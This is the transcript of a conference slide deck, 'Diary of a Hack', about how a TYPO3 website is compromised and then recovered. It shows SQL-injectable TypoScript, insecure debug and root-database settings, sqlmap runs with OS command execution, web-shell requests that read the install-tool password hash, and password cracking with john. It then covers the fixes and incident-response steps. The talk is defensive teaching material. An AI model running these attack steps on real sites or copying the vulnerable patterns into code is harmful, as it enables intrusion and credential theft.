Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Diary of a Hack

Diary of a Hack

Telling the story how Websites are hacked. Starting from day one with creating and deploying a feature with a vulnerability and ending with cleaning up the website after it was taken over by attackers.

Helmut Hummel

April 22, 2016
Tweet

More Decks by Helmut Hummel

Other Decks in Technology

Transcript

  1. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks Diary of a Hack Helmut Hummel <[email protected]> 22.04.2016 Vulnerabilities and Exploits 1
  2. 2 @helhum

  3. Security 3

  4. 4 http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

  5. 5 http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

  6. 6 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  7. 7 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  8. 8 http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

  9. 9 https://xkcd.com/327/

  10. 10 http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

  11. 11 https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

  12. 12 http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

  13. 13 http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

  14. 14

  15. Diary of a Hack 15

  16. Diary of a Hack Day 1 - Implementing a feature

    16
  17. Diary of a Hack 17 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where.wrap = colPos=|
 select.where.data = GP:colPos
 }
  18. Diary of a Hack 18 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where.wrap = header like '%|%'
 select.where.data = GP:search
 }
  19. Diary of a Hack Day 2 - Testing the feature

    19
  20. Diary of a Hack 20

  21. Diary of a Hack 21 'BE/debug' => '1' 'FE/debug' =>

    '1' 'SYS/devIPmask' => '*' 'SYS/displayErrors' => '1' 'SYS/sqlDebug' => '1' 'SYS/exceptionalErrors' => '28674'
  22. Diary of a Hack 22

  23. Diary of a Hack 23 'DB/username' => 'root'

  24. Diary of a Hack 24

  25. Diary of a Hack Day 3 - Distraction 25

  26. Diary of a Hack 26

  27. Diary of a Hack Day 4 - Attraction 27

  28. Diary of a Hack 28 https://www.google.de/?q=exec_SELECTquery+%22You +have+an+error+in+your+SQL+syntax%22

  29. Diary of a Hack Day 5 - Exploitation 29

  30. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks Excursion - SQLi 30
  31. Excursion - SQLi 31 SELECT * FROM tt_content WHERE colPos

    = 0
  32. 32 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi
  33. 33 Excursion - SQLi

  34. 34 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi
  35. 35 'SELECT * FROM tt_content WHERE colPos = 0 or

    hidden = 1' $_GET['colPos'] Excursion - SQLi
  36. Disclaimer 36

  37. Don’t do this at home! 37

  38. (unless you have written permit) 38

  39. Diary of a Hack 39 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' ! GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
  40. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks The power of MySQL 40
  41. Diary of a Hack 41 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' \ —os-cmd='ls -al'
  42. Diary of a Hack 42

  43. Diary of a Hack 43 http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ ENABLE_INSTALL_TOOL ! http://security.dev/typo3/sysext/install/Start/Install.php !

    http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword %20typo3conf/LocalConfiguration.php
  44. Diary of a Hack 44 $ john pw Loaded 1

    password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5]) password (dummy) guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
  45. Diary of a Hack 45

  46. Diary of a Hack Day 5 - Discovery 46

  47. Diary of a Hack Discovery • Take site offline! •

    seriously • I mean it 47
  48. 48

  49. Diary of a Hack Day 6 - Analysis 49

  50. Diary of a Hack Analysis • Make a backup of

    current state (files, DB, logs) • Search all logs for „suspicious“ entries • Find point of entry (security issue) • If in doubt: get help 50
  51. Diary of a Hack Day 7 - Fix 51

  52. Diary of a Hack 52 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where = colPos=###colPos###
 select.markers {
 colPos.data = GP:colPos
 }
 }
  53. Diary of a Hack 53 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where = header like ###search###
 select.markers {
 search.data = GP:search
 search.wrap = %|%
 }
 }
  54. Diary of a Hack Fix • Close security issue in

    Code/ Extension/ Core • Restore from backup • Or if you really know what you are doing: cleanup installation • Go online again • Plan improvements (education, monitoring, …) 54
  55. Diary of a Hack Day 8 - Improve 55

  56. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Topictext Lessons learned • Development/ Testing Environment • Deploy to Production • Least privilege • There is no Software without bugs. Be prepared! 56
  57. Diary of a Hack Best Practice • Operations • Regular

    updates • Backups • Monitoring • Development • Peer Reviews (TypoScript, Code, Templates) • (automated) Tests • Focus • Education • Allocate time for all of the above 57
  58. Questions? 58

  59. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Diary of a Hack Resources • http://docs.typo3.org/typo3cms/SecurityGuide/ • http://sqlmap.org • http://www.openwall.com/john/ • https://www.owasp.org/ 59
  60. Thank you! 60

  61. 61 @helhum http://helhum.io [email protected]